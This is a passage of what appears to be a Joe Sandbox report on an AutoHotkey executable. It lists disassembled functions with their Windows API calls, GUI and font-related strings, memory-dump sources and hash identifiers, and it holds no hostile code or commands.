                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004716D5
                                      • MulDiv.KERNEL32(?,00000048,00000000), ref: 004716ED
                                      • SelectObject.GDI32(00000000,00000000), ref: 0047173B
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00471740
                                      • _wcsncpy.LIBCMT ref: 004717AE
                                      • __wcsnicmp.LIBCMT ref: 00471822
                                      • GetDC.USER32(00000000), ref: 004719E6
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004719F1
                                      • _wcsncpy.LIBCMT ref: 00471A18
                                      • EnumFontFamiliesExW.GDI32(00000000,?,00481380,?,00000000,00000000,00000000,00000000), ref: 00471A42
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00471A72
                                      • MulDiv.KERNEL32(?,00000000,00000048), ref: 00471B01
                                      • CreateFontW.GDI32(00000000), ref: 00471B0A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Object$CapsDeviceFontReleaseSelectText_wcsncpy$CreateEnumFaceFamiliesMetricsStock__wcsnicmp_memset
                                      • String ID: Can't create font.$Too many fonts.$bold$italic$norm$strike$underline
                                      • API String ID: 1062558797-336657898
                                      • Opcode ID: 9cb05b44418e01063ba8d39eae54e3db2149855d72524ecb9d39af64839cb0c1
                                      • Instruction ID: 3974631e3c14450c0bc07f176beca0b664881a305c6b9d82be918dd1a62c3582
                                      • Opcode Fuzzy Hash: 9cb05b44418e01063ba8d39eae54e3db2149855d72524ecb9d39af64839cb0c1
                                      • Instruction Fuzzy Hash: 29D116B1A083409BE3349B34DC46BEB77E4EB95714F04892EE68D872D1E7B89409C75B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041C620 Relevance: 52.6, APIs: 15, Strings: 15, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Checked$Choice$CurrentCol$CurrentLine$Enabled$ExStyle$FindString$Hwnd$Line$LineCount$List$Selected$Style$Tab$Visible
                                      • API String ID: 3832890014-586525042
                                      • Opcode ID: 6e95d8e3919229d431c6193dcbf8ed0618aa7b6650a646b41026138ca5863f24
                                      • Instruction ID: 19224e3fbce9f318ada42a70bc9d29129aebdf4092152744b19d80f3b135b2c4
                                      • Opcode Fuzzy Hash: 6e95d8e3919229d431c6193dcbf8ed0618aa7b6650a646b41026138ca5863f24
                                      • Instruction Fuzzy Hash: 25316969A81A1122EF15212E4E53BDF24895B21B0BFC4487BFC14D43C1F78EEA55D1AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042B57D Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 216COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcsnicmp_wcsncpy
                                      • String ID: Add$Delete$DeleteCol$Function name too long.$GetCount$GetNext$GetText$Insert$InsertCol$LV_$Modify$ModifyCol$SetImageList
                                      • API String ID: 3240457921-3049600462
                                      • Opcode ID: e9334eb82869fbbf4a6ff3359bd9831252c41840863a3eb8633945da137164f8
                                      • Instruction ID: 39cb9a3fd403fc370eef6fca9333c88eac97b048f511fd6fd33b024af1fbf178
                                      • Opcode Fuzzy Hash: e9334eb82869fbbf4a6ff3359bd9831252c41840863a3eb8633945da137164f8
                                      • Instruction Fuzzy Hash: E461D372A043125BCB10DE559881AAB73D4EF94309F544D3FEC08A7241EB79EE09C7DA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041B4F0 Relevance: 47.4, APIs: 14, Strings: 13, Instructions: 143COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcstoi64wcstoxq
                                      • String ID: Bass$BassBoost$Equalizer$Loudness$Mono$Mute$OnOff$Pan$QSoundPan$StereoEnh$Treble$Vol$Volume
                                      • API String ID: 1236819900-1456001458
                                      • Opcode ID: 4de2b772e860efe6bfa0e5e01ff30c470bc476e505a6ef8bcd5998adcf571d97
                                      • Instruction ID: 7a841154874060bda45ad242b3a0e3ab406a6aca7e27b374eed37d88fdefb1dc
                                      • Opcode Fuzzy Hash: 4de2b772e860efe6bfa0e5e01ff30c470bc476e505a6ef8bcd5998adcf571d97
                                      • Instruction Fuzzy Hash: 3E310CA5E4161032DF16212A2D03BCE64454B71B4BFC8847AFC0895381F78EDAA991FF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00459540 Relevance: 46.0, APIs: 17, Strings: 9, Instructions: 458windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00001101,00000000,00000000), ref: 0045960E
                                      • __wcsicoll.LIBCMT ref: 0045974E
                                      • __wcsnicmp.LIBCMT ref: 00459779
                                      • __wcsicoll.LIBCMT ref: 0045978E
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004599F4
                                      • SendMessageW.USER32(00000000,0000113F,00000000,00000008), ref: 00459A50
                                      • SendMessageW.USER32(00000000,00001114,00000000,?), ref: 00459A83
                                      • SendMessageW.USER32(00000000,0000110B,00000005,?), ref: 00459A9F
                                      • SendMessageW.USER32(?,0000110B,?,?), ref: 00459ABB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$__wcsicoll$__wcsnicmp
                                      • String ID: "$Bold$Check$Expand$First$Icon$Select$Sort$Vis
                                      • API String ID: 2665471568-3379154359
                                      • Opcode ID: aefc862266892fa3553a4b9676a82e3c416c81966e14b5f42d9e64b0f223fdcd
                                      • Instruction ID: 177f2d6e0b9f6bcdb33ea9b9a590cea1e37f561e74b2ad1f0db3a3b274f33301
                                      • Opcode Fuzzy Hash: aefc862266892fa3553a4b9676a82e3c416c81966e14b5f42d9e64b0f223fdcd
                                      • Instruction Fuzzy Hash: 40F17FB1A04341EBD7209F25C84176BB7E4AF95306F14896EFC8997382E378DD48CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045B320 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 199COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __fassign$__wcsicoll__wcsnicmp
                                      • String ID: Joy$JoyAxes$JoyButtons$JoyInfo$JoyName$JoyPOV$JoyR$JoyU$JoyV$JoyX$JoyY$JoyZ
                                      • API String ID: 3933591233-249873715
                                      • Opcode ID: 324fb9d4e3fc3b38459b0ab995a2c816fef32ee7648b51ad36eb58285b925485
                                      • Instruction ID: 88364c352382a1842044c7ac81f3648935400cc86ed10014846f1794616480b6
                                      • Opcode Fuzzy Hash: 324fb9d4e3fc3b38459b0ab995a2c816fef32ee7648b51ad36eb58285b925485
                                      • Instruction Fuzzy Hash: 2741656260061022EE21252E7D82BEF5689CF61717F15447BFC44E9383F78DDD8A90EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004420F0 Relevance: 44.1, APIs: 22, Strings: 3, Instructions: 381COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: +-^$Off$Parameter #1 invalid.
                                      • API String ID: 3832890014-3419364491
                                      • Opcode ID: a59713dcf4e9b9ed5e5df409c0f5cd1a5386660aa5f1d5158408fda7fbb28d9f
                                      • Instruction ID: 2ad6502e5a490b1c9097729e5c89c7b9b97553846f446f54bf96822bc900ae32
                                      • Opcode Fuzzy Hash: a59713dcf4e9b9ed5e5df409c0f5cd1a5386660aa5f1d5158408fda7fbb28d9f
                                      • Instruction Fuzzy Hash: 01C15A316443105BE720AF24AD44BBF7BA4DB86725F50063BFD51A62C1CBBC9D09C7AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042B7F4 Relevance: 43.9, APIs: 12, Strings: 13, Instructions: 137COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Add$Delete$Function name too long.$Get$GetChild$GetCount$GetNext$GetParent$GetPrev$GetSelection$GetText$Modify$SetImageList
                                      • API String ID: 3832890014-4116235998
                                      • Opcode ID: 182f494c8bd9b5c5ebf5ebfb06b443153f524f0c481fdf48a02403c2e3c90cd0
                                      • Instruction ID: 89202ee7d12e203e829cc0bfd51c06d45cd8840db19b3387679bcdaadd2cd49d
                                      • Opcode Fuzzy Hash: 182f494c8bd9b5c5ebf5ebfb06b443153f524f0c481fdf48a02403c2e3c90cd0
                                      • Instruction Fuzzy Hash: 8241ED72A043125ACB00E6659D42BAF33D89E5474AF54493FFD08A3241F76DEE08C7AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0045C570 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 199windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemMetrics.USER32(00000007), ref: 0045C589
                                      • GetSystemMetrics.USER32(00000007), ref: 0045C597
                                      • GetSystemMetrics.USER32(00000004), ref: 0045C59F
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0045C5B0
                                      • IsWindow.USER32(00000000), ref: 0045C5EA
                                      • DestroyWindow.USER32(00000000,?,?,?,00000000), ref: 0045C5FA
                                      • CreateWindowExW.USER32(00000008,AutoHotkey2,?,88C00000,?,?,00000000,?,0002044A,00000000,00400000,00000000), ref: 0045C63A
                                      • GetClientRect.USER32(00000000,?), ref: 0045C647
                                      • CreateWindowExW.USER32(00000000,static,?,50000001,00000000,00000000,?,?,00000000,00000000,00400000,00000000), ref: 0045C688
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0045C6A4
                                      • _wcsncpy.LIBCMT ref: 0045C6C2
                                      • EnumFontFamiliesExW.GDI32(00000000,?,00481380,?,00000000,?,?,00000000), ref: 0045C6E9
                                      • GetStockObject.GDI32(00000011), ref: 0045C71B
                                      • SelectObject.GDI32(00000000,00000000), ref: 0045C723
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 0045C734
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045C73D
                                      • DeleteDC.GDI32(00000000), ref: 0045C746
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045C784
                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 0045C795
                                      • ShowWindow.USER32(00000000,00000004,?,?,?,00000000), ref: 0045C7A4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$CreateSystem$Metrics$FontObject$CapsClientDeleteDestroyDeviceEnumFaceFamiliesInfoMessageParametersRectSelectSendShowStockText_wcsncpy
                                      • String ID: AutoHotkey2$DISPLAY$Segoe UI$static
                                      • API String ID: 2836835088-4085670783
                                      • Opcode ID: 431dd126622e5b417c8c728b7b198fdbccf32c373813646f6aef35dee31cb68b
                                      • Instruction ID: 76b2cf4883b07112d259e3fb83bb736c3c1e64ff025fd089b87f00de07ebcc0a
                                      • Opcode Fuzzy Hash: 431dd126622e5b417c8c728b7b198fdbccf32c373813646f6aef35dee31cb68b
                                      • Instruction Fuzzy Hash: 1F61B871654300BFE314DF64DC8AFAB7BE8EB89704F044529FA09E72D1D6B4A805CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D230 Relevance: 42.1, APIs: 12, Strings: 12, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
                                      • String ID: Alnum$Alpha$Date$Digit$Float$Integer$Lower$Number$Space$Time$Upper$Xdigit
                                      • API String ID: 3832890014-3813714638
                                      • Opcode ID: a0d02113a8eb6ae61e9ef839cc1767f4e3974e9db0c3cfa1f2aa6923a9968183
                                      • Instruction ID: c9fe76e2a0921c31be59344f814932a5690db55d9624fbd926a3e453ee902e46
                                      • Opcode Fuzzy Hash: a0d02113a8eb6ae61e9ef839cc1767f4e3974e9db0c3cfa1f2aa6923a9968183
                                      • Instruction Fuzzy Hash: 412179A9E4161122DF25312E5E03BDF24885F61B4BF84447BFC14D1282F78EDA45D0BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004142F0 Relevance: 40.4, APIs: 16, Strings: 7, Instructions: 128COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$__wcsicmp_l
                                      • String ID: LEFT$MIDDLE$RIGHT$WheelDown$WheelLeft$WheelRight$WheelUp
                                      • API String ID: 3172861507-1318937625
                                      • Opcode ID: 14026f6f51614b6e49c8c7e65718f2fe53052d8c8a1b5c921e7ae00cb6230ab8
                                      • Instruction ID: 403551d3aff604dd2b5aa9bc299c1c3f404ed81b416b63eb7d810ecb64373364
                                      • Opcode Fuzzy Hash: 14026f6f51614b6e49c8c7e65718f2fe53052d8c8a1b5c921e7ae00cb6230ab8
                                      • Instruction Fuzzy Hash: EF31C859A8161131EF25223A5E07BDF28C80FA1747F58443FB814E0282FA8EDA95C0BE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043D240 Relevance: 38.8, APIs: 17, Strings: 5, Instructions: 295windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __fassign.LIBCMT ref: 0043D262
                                        • Part of subcall function 0049BF9D: wcstoxl.LIBCMT ref: 0049BFAD
                                      • IsWindow.USER32(004B0CF8), ref: 0043D2A5
                                      • DestroyWindow.USER32(004B0CF8), ref: 0043D2B0
                                      • GetCursorPos.USER32 ref: 0043D304
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 0043D37A
                                      • GetMonitorInfoW.USER32 ref: 0043D394
                                      • _memset.LIBCMT ref: 0043D3DC
                                      • IsWindow.USER32(004B0CF8), ref: 0043D40A
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0043D447
                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 0043D467
                                      • SendMessageW.USER32(00000000,0000041F,00000000,?), ref: 0043D492
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0043D4B2
                                      • SendMessageW.USER32(00000000,00000412,00000000,?), ref: 0043D4D1
                                      • SendMessageW.USER32(00000000,00000439,00000000,?), ref: 0043D502
                                      • GetWindowRect.USER32(00000000,?), ref: 0043D51C
                                      • SendMessageW.USER32(00000000,00000412,00000000,?), ref: 0043D5B6
                                      • SendMessageW.USER32(00000000,00000411,00000001,?), ref: 0043D5C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$Monitor$CreateCursorDestroyFromInfoPointRect__fassign_memsetwcstoxl
                                      • String ID: $($,$Max window number is 20.$tooltips_class32
                                      • API String ID: 3638321345-788377568
                                      • Opcode ID: 4a042d262a014254176af59e984552144e8c75a45db4e2f25bef435f8e1fc1ad
                                      • Instruction ID: b96c47525a809df8c5c91ead06732a3791875d36d43fc57e6cfc90c3f2399f4e
                                      • Opcode Fuzzy Hash: 4a042d262a014254176af59e984552144e8c75a45db4e2f25bef435f8e1fc1ad
                                      • Instruction Fuzzy Hash: 7AB1A2719083049FD320DF18DC84B6BBBF4EBC9704F10492EF58597291D7B89945CB9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004512B0 Relevance: 38.7, APIs: 11, Strings: 11, Instructions: 244COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$_wcsncpy
                                      • String ID: *pP$AStr$Char$Double$Float$Int$Int64$Ptr$Short$Str$WStr
                                      • API String ID: 1630244902-313837492
                                      • Opcode ID: aea77092f9eb4852a9c9db10f1374c58d9906d0a667496e43c52ff77a19b2d45
                                      • Instruction ID: 666fc01668367b2fffe87fc30646e9f91d854b6140f4c20060ad13d169a4cdaa
                                      • Opcode Fuzzy Hash: aea77092f9eb4852a9c9db10f1374c58d9906d0a667496e43c52ff77a19b2d45
                                      • Instruction Fuzzy Hash: FF7126A6A0030456CB24DE19AC817AF73D4AB80353F98843FED4586351F37ED94DC3AA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00458660 Relevance: 37.2, APIs: 12, Strings: 9, Instructions: 439windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __wcsnicmp.LIBCMT ref: 004587FA
                                      • __wcsnicmp.LIBCMT ref: 00458844
                                      • __wcsnicmp.LIBCMT ref: 00458891
                                      • __wcsnicmp.LIBCMT ref: 00458923
                                      • __wcsnicmp.LIBCMT ref: 004588F0
                                        • Part of subcall function 004142C0: __fassign.LIBCMT ref: 004142D0
                                      • __wcsicoll.LIBCMT ref: 00458952
                                      • SendMessageW.USER32(00000001,00001004,00000000,00000000), ref: 004589B7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp$MessageSend__fassign__wcsicoll
                                      • String ID: A$Check$Col$Focus$I$Icon$M$Select$Vis
                                      • API String ID: 1367502766-1624853574
                                      • Opcode ID: b96b09f58eb34c085970caaafc32afa155f1af2238dd4e71aca7723c594e8ce0
                                      • Instruction ID: 5d2ea2f7bc6f6a559de23167080873fcb627796e0d67738eed90ba4cd93cc34f
                                      • Opcode Fuzzy Hash: b96b09f58eb34c085970caaafc32afa155f1af2238dd4e71aca7723c594e8ce0
                                      • Instruction Fuzzy Hash: 16F1AFB0A043418FD7209F24C88576BBBE5AB85305F14492FFD85A7392DFB9D848CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0047A610 Relevance: 33.6, APIs: 9, Strings: 10, Instructions: 372COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll
